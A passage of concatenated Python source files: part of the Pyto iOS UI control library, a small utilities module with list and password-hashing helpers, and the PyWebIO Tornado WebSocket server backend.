self.__py_view__.managedValue = _values.value(self)
self.segments = segments
@property
def segments(self) -> List[str]:
"""
A list of strings representing segments titles.
:rtype: List[str]
"""
return list(map(str, self.__py_view__.segments))
@segments.setter
def segments(self, new_value: List[str]):
self.__py_view__.segments = new_value
@property
def selected_segment(self) -> int:
"""
The index of selected segment.
:rtype: int
"""
return self.__py_view__.selectedSegmentIndex
@selected_segment.setter
def selected_segment(self, new_value: int):
self.__py_view__.selectedSegmentIndex = new_value
class Slider(Control):
"""
A control used to select a single value from a continuous range of values. The default range is located between ``0`` and ``1``.
The function passed to :data:`~pyto_ui.Control.action` will be called when the slider changes its value.
"""
def __init__(self, value: float = 0.5):
self.__py_view__ = __PySlider__.newView()
self.__py_view__.managedValue = _values.value(self)
self.value = value
def set_value_with_animation(self, value: float):
"""
Sets the value of the slider with an animation.
:param value: The value of the slider.
"""
self.__py_view__.setValue(value, animated=True)
@property
def value(self) -> float:
"""
The value of the slider between its range.
:rtype: float
"""
return self.__py_view__.value
@value.setter
def value(self, new_value: float):
self.__py_view__.value = new_value
@property
def minimum_value(self) -> float:
"""
The minimum value of the slider.
:rtype: float
"""
return self.__py_view__.minimumValue
@minimum_value.setter
def minimum_value(self, new_value: float):
self.__py_view__.minimumValue = new_value
@property
def maximum_value(self) -> float:
"""
The maximum value of the slider.
:rtype: float
"""
return self.__py_view__.maximumValue
@maximum_value.setter
def maximum_value(self, new_value: float):
self.__py_view__.maximumValue = new_value
@property
def minimum_track_color(self) -> Color:
"""
The color used to tint the default minimum track.
:rtype: Color
"""
c = self.__py_view__.minimumTrackColor
if c is None:
return None
else:
return Color(c)
@minimum_track_color.setter
def minimum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.minimumTrackColor = None
else:
self.__py_view__.minimumTrackColor = new_value.__py_color__
@property
def maximum_track_color(self) -> Color:
"""
The color used to tint the default maximum track.
:rtype: Color
"""
c = self.__py_view__.maximumTrackColor
if c is None:
return None
else:
return Color(c)
@maximum_track_color.setter
def maximum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.maximumTrackColor = None
else:
self.__py_view__.maximumTrackColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the default thumb.
:rtype: Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Switch(Control):
"""
A control that offers a binary choice, such as On/Off.
The function passed to :data:`~pyto_ui.Control.action` will be called when the switch changes its value.
"""
def __init__(self, on=False):
self.__py_view__ = __PySwitch__.newView()
self.__py_view__.managedValue = _values.value(self)
self.on = on
def set_on_with_animation(self, on: bool):
"""
Sets the state of the switch to On or Off with an animation.
:param on: A boolean indicating whether the switch should be On.
"""
self.__py_view__.setOn(on, animated=True)
@property
def on(self) -> bool:
"""
A boolean indicating whether the switch is On.
:rtype: bool
"""
return self.__py_view__.isOn
@on.setter
def on(self, new_value: bool):
self.__py_view__.isOn = new_value
@property
def on_color(self) -> Color:
"""
The color used to tint the appearance of the switch when it is turned on.
:rtype: Color
"""
c = self.__py_view__.onColor
if c is None:
return None
else:
return Color(c)
@on_color.setter
def on_color(self, new_value: Color):
if new_value is None:
self.__py_view__.onColor = None
else:
self.__py_view__.onColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the appearance of the thumb.
:rtype: Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Button(Control):
"""
A control that executes your custom code in response to user interactions.
To add an action, set :data:`~pyto_ui.Control.action`.
For types of buttons, see `Button Type <constants.html#button-type>`_ constants.
"""
def __init__(
self,
type: BUTTON_TYPE = __v__("BUTTON_TYPE_SYSTEM"),
title: str = "",
image: "Image" = None,
):
if type == "BUTTON_TYPE_SYSTEM":
self.__py_view__ = __PyButton__.newButtonWithType(BUTTON_TYPE_SYSTEM)
else:
self.__py_view__ = __PyButton__.newButtonWithType(type)
self.__py_view__.managedValue = _values.value(self)
self.title = title
self.image = image
@property
def title(self) -> str:
"""
The title of the button
:rtype: str
"""
title = self.__py_view__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def title_color(self) -> Color:
"""
The color of the title.
:rtype: Color
"""
c = self.__py_view__.titleColor
if c is None:
return None
else:
return Color(c)
@title_color.setter
def title_color(self, new_value: Color):
if new_value is None:
self.__py_view__.titleColor = None
else:
self.__py_view__.titleColor = new_value.__py_color__
@property
def image(self) -> "Image":
"""
The image displayed on the button. Can be a ``PIL`` image or an ``UIKit`` symbol image. For more information about symbols, see :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
@property
def font(self) -> Font:
"""
The font to be applied to the text.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
class TextField(Control):
"""
A field to type single line text.
The function passed to :data:`~pyto_ui.Control.action` will be called when the text field changes its text.
"""
def __init__(self, text: str = "", placeholder: str = None):
self.__py_view__ = __PyTextField__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self.placeholder = placeholder
@property
def border_style(self) -> TEXT_FIELD_BORDER_STYLE:
return self.__py_view__.borderStyle
@border_style.setter
def border_style(self, new_value: TEXT_FIELD_BORDER_STYLE):
self.__py_view__.borderStyle = new_value
@property
def did_begin_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field begins editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field ends editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def text(self) -> str:
"""
The text contained in the Text Field.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def placeholder(self) -> str:
"""
A gray text shown when there is no text.
:rtype: str
"""
return str(self.__py_view__.placeholder)
@placeholder.setter
def placeholder(self, new_value: str):
self.__py_view__.placeholder = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing th text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data. The text entered by the user will be hidden.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
###################
# MARK: - Functions
###################
def __ui_image_from_pil_image__(image):
if image is None:
return None
with BytesIO() as buffered:
image.save(buffered, format='PNG')
img_str = base64.b64encode(buffered.getvalue())
data = __NSData__.alloc().initWithBase64EncodedString(img_str, options=0)
return UIImage.alloc().initWithData(data)
def __pil_image_from_ui_image__(image):
from PIL import Image
if image is None:
return None
img_str = str(image.data.base64EncodedStringWithOptions(0))
msg = base64.b64decode(img_str)
return Image.open(BytesIO(msg))
def font_family_names() -> List[str]:
"""
Returns all font family names that can be used to initialize a font.
:rtype: List[str]
"""
names = __UIFont__.familyNames
py_names = []
for name in names:
py_names.append(str(name))
return py_names
def image_with_system_name(name: str) -> UIImage:
"""
Returns a system symbol image from given name. The return value is an UIKit ``UIImage`` object, so it can only be used on the ``pyto_ui`` library.
More info about symbols on `Apple's Web Site <https://developer.apple.com/design/resources/>`_ .
:param name: The name of the SF Symbol.
:rtype: UIImage
"""
image = UIImage.systemImageNamed(name, withConfiguration=None)
if image is None:
raise ValueError("The given symbol name is not valid.")
return image
def show_view(view: View, mode: PRESENTATION_MODE):
"""
Presents the given view.
This function doesn't return until the view is closed. You can use another thread to perform background tasks and modify the UI after it's presented.
On iPad, if the view has a custom size, it will be used for the presentation.
:param view: The :class:`~pyto_ui.View` object to present.
:param mode: The presentation mode to use. The value will be ignored on a widget. See `Presentation Mode <constants.html#presentation-mode>`_ constants for possible values.
"""
def show(view, mode):
view.__py_view__.presentationMode = mode
try:
ConsoleViewController.showView(
view.__py_view__, onConsoleForPath=threading.current_thread().script_path
)
except AttributeError:
ConsoleViewController.showView(view.__py_view__, onConsoleForPath=None)
while view.__py_view__.isPresented:
sleep(0.2)
if ("__editor_delegate__" in dir(builtins) and builtins.__editor_delegate__ is not None):
global show_view
_show_view = show_view
show_view = show
try:
builtins.__editor_delegate__.show_ui(view, mode)
return
except NotImplementedError:
pass
finally:
show_view = _show_view
show(view, mode)
|
utils.py
|
#!/usr/bin/env python
from __future__ import print_function
"""
utils.py
Created by Jason Sundram, on 2010-04-05.
Copyright (c) 2010 The Echo Nest. All rights reserved.
Expanded Chris Angelico 2014 with additional utilities.
"""
import threading, os
import binascii
import hashlib
import collections
import random
def flatten(l):
""" Converts a list of tuples to a flat list.
e.g. flatten([(1,2), (3,4)]) => [1,2,3,4]
"""
return [item for pair in l for item in pair]
def tuples(l, n=2):
""" returns n-tuples from l.
e.g. tuples(range(4), n=2) -> [(0, 1), (1, 2), (2, 3)]
"""
return zip(*[l[i:] for i in range(n)])
def rows(m):
"""returns the # of rows in a numpy matrix"""
return m.shape[0]
magic_log = None
class Magic_Str(str):
"""Callable string. If called, it returns itself with () appended.
It's also able to be treated as an integer (it'll be zero).
"""
def __call__(self, *args, **kw):
print(self+"()", file=magic_log); magic_log.flush()
return self+"()"
def __int__(self): return 0
def __index__(self): return 0
class Magic_Anything(object):
"""
Magic class that has every possible method/attribute
Actually, there are no methods, per se. When any attribute is sought,
a Magic_Str() will be returned.
"""
def __init__(self, id):
self._id = id
if not magic_log: magic_log = open("magic.log", "w")
def __repr__(self):
return "Magic_Anything(" + repr(self._id) + ")"
def __getattribute__(self, name):
if name == "id": return self._id
if name.startswith("_"): return object.__getattribute__(self, name)
print(repr(self) + "." + name, file=magic_log); magic_log.flush()
return Magic_Str(repr(self) + "." + name)
def shuffler(func, gen):
"""Call func(next(gen)) repeatedly.
TODO: Should this become for x in gen: func(x) ?
Currently, a StopIteration will bubble unexpectedly.
Not currently used.
"""
while True:
func(next(gen))
def daemonize(target, *args):
"""Start a daemon thread to call target(*args)."""
t = threading.Thread(target=target, args=args)
t.daemon = True
t.start()
def random_hex():
return binascii.b2a_hex(os.urandom(8)).decode("ascii")
def hash_password(password):
salt = os.urandom(16)
hash = hashlib.sha256(salt + password).hexdigest()
return binascii.hexlify(salt).decode("ascii") + "-" + hash
def check_password(pwd, password):
if isinstance(pwd, str): pwd = pwd.encode("ascii")
if isinstance(password, str): password = password.encode("ascii")
if b"-" not in pwd: return False
salt, hash = pwd.split(b"-", 1)
return hashlib.sha256(binascii.unhexlify(salt)+password).hexdigest().encode("ascii") == hash
def alphabetize_ignore_the(list_of_names):
"""Return alphabetized list of names, ignoring the word "The" in alphabetization.
TODO: Use a standard locale-based ordering function.
"""
ordered_object = {}
#TODO abstract me, please and stop wetting
for item in list_of_names:
if item[0][:4].lower() == 'the ':
ordered_object[item[0][4:].upper()] = ('', item[0])
elif len(item[0].split(',')) > 1:
# if item contains a comma, split into Last, First
the_item = item[0].split(',')
the_item[1] = the_item[1].lstrip()
# Add a random number so duplicate names don't break this
# seems like a bit of a hack. This whole approach is probably
# less ideal than a really well composed database query.
# Random names shouldn't be necessary as other two conditions
# return unique values from the db.
ordered_object[the_item[0].upper()+str(random.random())] = the_item
else:
ordered_object[item[0].upper()] = ('', item[0])
return collections.OrderedDict(sorted(ordered_object.items()))
|
tornado.py
|
import asyncio
import fnmatch
import json
import logging
import os
import threading
import time
import webbrowser
from functools import partial
from typing import Dict
from urllib.parse import urlparse
import tornado
import tornado.httpserver
import tornado.ioloop
from tornado.web import StaticFileHandler
from tornado.websocket import WebSocketHandler
from . import page
from .remote_access import start_remote_access_service
from .page import make_applications, render_page
from .utils import cdn_validation, deserialize_binary_event, print_listen_address
from ..session import CoroutineBasedSession, ThreadBasedSession, ScriptModeSession, \
register_session_implement_for_target, Session
from ..session.base import get_session_info_from_headers
from ..utils import get_free_port, wait_host_port, STATIC_PATH, iscoroutinefunction, isgeneratorfunction, \
check_webio_js, parse_file_size, random_str, LRUDict
logger = logging.getLogger(__name__)
_ioloop = None
def set_ioloop(loop):
global _ioloop
_ioloop = loop
def ioloop() -> tornado.ioloop.IOLoop:
"""获得运行Tornado server的IOLoop
本方法当前仅在显示boken app时使用
This method is currently only used when displaying boken app"""
global _ioloop
return _ioloop
def _check_origin(origin, allowed_origins, handler: WebSocketHandler):
if _is_same_site(origin, handler):
return True
return any(
fnmatch.fnmatch(origin, pattern)
for pattern in allowed_origins
)
def _is_same_site(origin, handler: WebSocketHandler):
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = handler.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def _webio_handler(applications=None, cdn=True, reconnect_timeout=0, check_origin_func=_is_same_site): # noqa: C901
"""
:param dict applications: dict of `name -> task function`
:param bool/str cdn: Whether to load front-end static resources from CDN
:param callable check_origin_func: check_origin_func(origin, handler) -> bool
:return: Tornado RequestHandler class
"""
check_webio_js()
if applications is None:
applications = dict(index=lambda: None) # mock PyWebIO app
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._close_from_session = False
self.session_id = None
self.session = None # type: Session
if reconnect_timeout and not type(self)._started_clean_task:
type(self)._started_clean_task = True
tornado.ioloop.IOLoop.current().call_later(reconnect_timeout // 2, type(self).clean_expired_sessions)
logger.debug("Started session clean task")
def get_app(self):
app_name = self.get_query_argument('app', 'index')
app = applications.get(app_name) or applications['index']
return app
def get_cdn(self):
if cdn is True and self.get_query_argument('_pywebio_cdn', '') == 'false':
return False
return cdn
async def get(self, *args, **kwargs) -> None:
# It's a simple http GET request
if self.request.headers.get("Upgrade", "").lower() != "websocket":
# Backward compatible
# Frontend detect whether the backend is http server
if self.get_query_argument('test', ''):
return self.write('')
app = self.get_app()
html = render_page(app, protocol='ws', cdn=self.get_cdn())
return self.write(html)
else:
await super().get()
def check_origin(self, origin):
return check_origin_func(origin=origin, handler=self)
def get_compression_options(self):
# Non-None enables compression with default options.
return {}
@classmethod
def clean_expired_sessions(cls):
tornado.ioloop.IOLoop.current().call_later(reconnect_timeout // 2, cls.clean_expired_sessions)
while cls._session_expire:
session_id, expire_ts = cls._session_expire.popitem(last=False) # 弹出最早过期的session
if time.time() < expire_ts:
# this session is not expired
cls._session_expire[session_id] = expire_ts # restore this item
cls._session_expire.move_to_end(session_id, last=False) # move to front
break
# clean this session
logger.debug("session %s expired" % session_id)
cls._connections.pop(session_id, None)
session = cls._webio_sessions.pop(session_id, None)
if session:
session.close(nonblock=True)
@classmethod
def send_msg_to_client(cls, _, session_id=None):
conn = cls._connections.get(session_id)
session = cls._webio_sessions[session_id]
if not conn or not conn.ws_connection:
return
for msg in session.get_task_commands():
try:
conn.write_message(json.dumps(msg))
except TypeError as e:
logger.exception('Data serialization error: %s\n'
'This may be because you pass the wrong type of parameter to the function'
' of PyWebIO.\nData content: %s', e, msg)
@classmethod
def close_from_session(cls, session_id=None):
cls.send_msg_to_client(None, session_id=session_id)
conn = cls._connections.pop(session_id, None)
cls._webio_sessions.pop(session_id, None)
if conn and conn.ws_connection:
conn._close_from_session = True
conn.close()
_started_clean_task = False
_session_expire = LRUDict() # session_id -> expire timestamp. In increasing order of expire time
_webio_sessions = {} # type: Dict[str, Session] # session_id -> session
_connections = {} # type: Dict[str, WSHandler] # session_id -> WSHandler
def open(self):
logger.debug("WebSocket opened")
cls = type(self)
self.session_id = self.get_query_argument('session', None)
if self.session_id in ('NEW', None): # 初始请求,创建新 Session
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
session_info['protocol'] = 'websocket'
application = self.get_app()
self.session_id = random_str(24)
cls._connections[self.session_id] = self
if iscoroutinefunction(application) or isgeneratorfunction(application):
self.session = CoroutineBasedSession(
application, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
on_session_close=partial(self.close_from_session, session_id=self.session_id))
else:
self.session = ThreadBasedSession(
application, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
on_session_close=partial(self.close_from_session, session_id=self.session_id),
loop=asyncio.get_event_loop())
cls._webio_sessions[self.session_id] = self.session
if reconnect_timeout:
self.write_message(json.dumps(dict(command='set_session_id', spec=self.session_id)))
elif self.session_id not in cls._webio_sessions: # WebIOSession deleted
self.write_message(json.dumps(dict(command='close_session')))
else:
self.session = cls._webio_sessions[self.session_id]
cls._session_expire.pop(self.session_id, None)
cls._connections[self.session_id] = self
cls.send_msg_to_client(self.session, self.session_id)
logger.debug('session id: %s' % self.session_id)
def on_message(self, message):
if isinstance(message, bytes):
event = deserialize_binary_event(message)
else:
event = json.loads(message)
if event is None:
return
self.session.send_client_event(event)
def on_close(self):
cls = type(self)
cls._connections.pop(self.session_id, None)
if not reconnect_timeout and not self._close_from_session:
self.session.close(nonblock=True)
elif reconnect_timeout:
if self._close_from_session:
cls._webio_sessions.pop(self.session_id, None)
elif self.session:
cls._session_expire[self.session_id] = time.time() + reconnect_timeout
logger.debug("WebSocket closed")
return WSHandler
def webio_handler(applications, cdn=True, reconnect_timeout=0, allowed_origins=None, check_origin=None):
"""Get the ``RequestHandler`` class for running PyWebIO applications in Tornado.
The ``RequestHandler`` communicates with the browser by WebSocket protocol.
The arguments of ``webio_handler()`` have the same meaning as for :func:`pywebio.platform.tornado.start_server`
"""
applications = make_applications(applications)
for target in applications.values():
register_session_implement_for_target(target)
cdn = cdn_validation(cdn, 'error') # if CDN is not available, raise error
if check_origin is None:
check_origin_func = partial(_check_origin, allowed_origins=allowed_origins or [])
else:
check_origin_func = lambda origin, handler: _is_same_site(origin, handler) or check_origin(origin)
return _webio_handler(applications=applications, cdn=cdn, check_origin_func=check_origin_func,
reconnect_timeout=reconnect_timeout)
async def open_webbrowser_on_server_started(host, port):
url = 'http://%s:%s' % (host, port)
is_open = await wait_host_port(host, port, duration=20)
if is_open:
logger.info('Try open %s in web browser' % url)
# webbrowser.open() may block, so invoke it in thread
threading.Thread(target=webbrowser.open, args=(url,), daemon=True).start()
else:
logger.error('Open %s in web browser failed.' % url)
def _setup_server(webio_handler, port=0, host='', static_dir=None, max_buffer_size=2 ** 20 * 200,
**tornado_app_settings):
if port == 0:
port = get_free_port()
handlers = [(r"/", webio_handler)]
if static_dir is not None:
handlers.append((r"/static/(.*)", StaticFileHandler, {"path": static_dir}))
handlers.append((r"/(.*)", StaticFileHandler, {"path": STATIC_PATH, 'default_filename': 'index.html'}))
app = tornado.web.Application(handlers=handlers, **tornado_app_settings)
# Credit: https://stackoverflow.com/questions/19074972/content-length-too-long-when-uploading-file-using-tornado
server = app.listen(port, address=host, max_buffer_size=max_buffer_size)
return server, port
def start_server(applications, port=0, host='',
debug=False, cdn=True, static_dir=None,
remote_access=False,
reconnect_timeout=0,
allowed_origins=None, check_origin=None,
auto_open_webbrowser=False,
max_payload_size='200M',
**tornado_app_settings):
"""Start a Tornado server to provide the PyWebIO application as a web service.
The Tornado server communicates with the browser by WebSocket protocol.
Tornado is the default backend server for PyWebIO applications,
and ``start_server`` can be imported directly using ``from pywebio import start_server``.
:param list/dict/callable applications: PyWebIO application.
Can be a task function, a list of functions, or a dictionary.
Refer to :ref:`Advanced topic: Multiple applications in start_server() <multiple_app>` for more information.
When the task function is a coroutine function, use :ref:`Coroutine-based session <coroutine_based_session>` implementation,
otherwise, use thread-based session implementation.
:param int port: The port the server listens on.
When set to ``0``, the server will automatically select a available port.
:param str host: The host the server listens on. ``host`` may be either an IP address or hostname.
If it’s a hostname, the server will listen on all IP addresses associated with the name.
``host`` may be an empty string or None to listen on all available interfaces.
:param bool debug: Tornado Server's debug mode. If enabled, the server will automatically reload for code changes.
See `tornado doc <https://www.tornadoweb.org/en/stable/guide/running.html#debug-mode>`_ for more detail.
:param bool/str cdn: Whether to load front-end static resources from CDN, the default is ``True``.
Can also use a string to directly set the url of PyWebIO static resources.
:param str static_dir: The directory to store the application static files.
The files in this directory can be accessed via ``http://<host>:<port>/static/files``.
For example, if there is a ``A/B.jpg`` file in ``static_dir`` path,
it can be accessed via ``http://<host>:<port>/static/A/B.jpg``.
:param bool remote_access: Whether to enable remote access, when enabled,
you can get a temporary public network access address for the current application,
others can access your application via this address.
:param bool auto_open_webbrowser: Whether or not auto open web browser when server is started (if the operating system allows it) .
:param int reconnect_timeout: The client can reconnect to server within ``reconnect_timeout`` seconds after an unexpected disconnection.
If set to 0 (default), once the client disconnects, the server session will be closed.
:param list allowed_origins: The allowed request source list. (The current server host is always allowed)
The source contains the protocol, domain name, and port part.
Can use Unix shell-style wildcards:
- ``*`` matches everything
- ``?`` matches any single character
- ``[seq]`` matches any character in *seq*
- ``[!seq]`` matches any character not in *seq*
Such as: ``https://*.example.com`` 、 ``*://*.example.com``
For detail, see `Python Doc <https://docs.python.org/zh-tw/3/library/fnmatch.html>`_
:param callable check_origin: The validation function for request source.
It receives the source string (which contains protocol, host, and port parts) as parameter and
return ``True/False`` to indicate that the server accepts/rejects the request.
If ``check_origin`` is set, the ``allowed_origins`` parameter will be ignored.
:param bool auto_open_webbrowser: Whether or not auto open web browser when server is started (if the operating system allows it) .
:param int/str max_payload_size: Max size of a websocket message which Tornado can accept.
Messages larger than the ``max_payload_size`` (default 200MB) will not be accepted.
``max_payload_size`` can be a integer indicating the number of bytes, or a string ending with `K` / `M` / `G`
(representing kilobytes, megabytes, and gigabytes, respectively).
E.g: ``500``, ``'40K'``, ``'3M'``
:param tornado_app_settings: Additional keyword arguments passed to the constructor of ``tornado.web.Application``.
For details, please refer: https://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings
"""
set_ioloop(tornado.ioloop.IOLoop.current()) # to enable bokeh app
cdn = cdn_validation(cdn, 'warn') # if CDN is not available, warn user and disable CDN
page.MAX_PAYLOAD_SIZE = max_payload_size = parse_file_size(max_payload_size)
debug = Session.debug = os.environ.get('PYWEBIO_DEBUG', debug)
# Since some cloud server may close idle connections (such as heroku),
# use `websocket_ping_interval` to keep the connection alive
tornado_app_settings.setdefault('websocket_ping_interval', 30)
tornado_app_settings.setdefault('websocket_max_message_size', max_payload_size) # Backward compatible
tornado_app_settings['websocket_max_message_size'] = parse_file_size(
tornado_app_settings['websocket_max_message_size'])
tornado_app_settings['debug'] = debug
handler = webio_handler(applications, cdn, allowed_origins=allowed_origins, check_origin=check_origin,
reconnect_timeout=reconnect_timeout)
_, port = _setup_server(webio_handler=handler, port=port, host=host, static_dir=static_dir,
max_buffer_size=max_payload_size, **tornado_app_settings)
print_listen_address(host, port)
if auto_open_webbrowser:
tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, host or 'localhost', port)
if remote_access:
start_remote_access_service(local_port=port)
tornado.ioloop.IOLoop.current().start()
def start_server_in_current_thread_session():
"""启动 script mode 的server,监听可用端口,并自动打开浏览器
Start the server for script mode, and automatically open the browser when the server port is available.
PYWEBIO_SCRIPT_MODE_PORT环境变量可以设置监听端口,并关闭自动打开浏览器,用于测试
The PYWEBIO_SCRIPT_MODE_PORT environment variable can set the listening port, just used in testing.
"""
websocket_conn_opened = threading.Event()
thread = threading.current_thread()
class SingleSessionWSHandler(_webio_handler(cdn=False)):
session = None
instance = None
closed = False
def open(self):
self.main_session = False
cls = type(self)
if SingleSessionWSHandler.session is None:
self.main_session = True
SingleSessionWSHandler.instance = self
self.session_id = 'main'
cls._connections[self.session_id] = self
session_info = get_session_info_from_headers(self.request.headers)
session_info['user_ip'] = self.request.remote_ip
session_info['request'] = self.request
session_info['backend'] = 'tornado'
session_info['protocol'] = 'websocket'
self.session = SingleSessionWSHandler.session = ScriptModeSession(
thread, session_info=session_info,
on_task_command=partial(self.send_msg_to_client, session_id=self.session_id),
loop=asyncio.get_event_loop())
websocket_conn_opened.set()
cls._webio_sessions[self.session_id] = self.session
else:
self.close()
def on_close(self):
if SingleSessionWSHandler.session is not None and self.main_session:
self.session.close()
self.closed = True
logger.debug('ScriptModeSession closed')
async def wait_to_stop_loop(server):
"""当只剩当前线程和Daemon线程运行时,关闭Server
When only the current thread and Daemon thread are running, close the Server"""
# 包括当前线程在内的非Daemon线程数
# The number of non-Daemon threads(including the current thread)
alive_none_daemonic_thread_cnt = None
while alive_none_daemonic_thread_cnt != 1:
alive_none_daemonic_thread_cnt = sum(
1 for t in threading.enumerate() if t.is_alive() and not t.isDaemon()
)
await asyncio.sleep(0.5)
if SingleSessionWSHandler.instance.session.need_keep_alive():
while not SingleSessionWSHandler.instance.closed:
await asyncio.sleep(0.5)
# 关闭Websocket连接
# Close the Websocket connection
if SingleSessionWSHandler.instance:
SingleSessionWSHandler.instance.close()
server.stop()
logger.debug('Closing tornado ioloop...')
tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task() and not t.done()]
for task in tasks:
task.cancel()
# 必须需要 await asyncio.sleep ,否则上方 task.cancel() 调用无法调度生效
# This line must be required, otherwise the `task.cancel()` call cannot be scheduled to take effect
await asyncio.sleep(0)
tornado.ioloop.IOLoop.current().stop()
def server_thread():
from tornado.log import access_log, app_log, gen_log
access_log.setLevel(logging.ERROR)
app_log.setLevel(logging.ERROR)
gen_log.setLevel(logging.ERROR)
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
set_ioloop(tornado.ioloop.IOLoop.current()) # to enable bokeh app
port = 0
